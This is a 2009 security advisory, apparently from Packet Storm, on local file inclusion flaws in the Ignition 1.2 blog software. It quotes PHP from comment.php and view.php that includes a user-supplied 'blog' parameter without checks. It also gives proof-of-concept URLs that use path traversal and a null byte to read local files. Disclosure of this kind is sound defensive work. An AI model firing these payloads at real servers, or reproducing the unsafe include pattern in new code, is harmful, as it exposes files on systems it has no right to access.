Ignition 1.2 Local File Inclusion

🗓️ 21 Dec 2009 00:00:00Reported by cOndemnedType

packetstorm🔗 packetstormsecurity.com👁 27 Views

Ignition 1.2 Multiple Local File Inclusion Vulnerabilities disclosed by cOndemned. magic_quotes_gpc should be turned off to exploit this vulnerability

`Ignition 1.2 Multiple Local File Inclusion Vulnerabilities  
disclosed by cOndemned  
download: http://launchpadlibrarian.net/27567060/ignition_1.2.zip  
note: magic_quotes_gpc should be turned off in order to exploit this vulnerability  
greetz: all friends, SecurityReason team :)  
  
  
comment.php  
  
1. <?php  
2. session_start();  
3. require ('settings.php');  
4. include ('posts/'.$_GET['blog'].'.txt'); # [1]  
5. ?>  
  
  
view.php  
  
1. <?php  
2. session_start();  
3. require ('settings.php');  
4. $blog = $_GET['blog'];  
5. if (file_exists('posts/'.$_GET['blog'].'.txt')) {  
6. include ('posts/'.$_GET['blog'].'.txt'); # [2]  
7. }else{  
  
  
proof of concept:  
  
[1] http://[attacked_box]/[ignition1.2]/comment.php?blog=../../../../[local_file]%00  
[2] http://[attacked_box]/[ignition1.2]/view.php?blog=../../../../../[local_file]%00  
  
`

21 Dec 2009 00:00Current

7.4High risk

Vulners AI Score7.4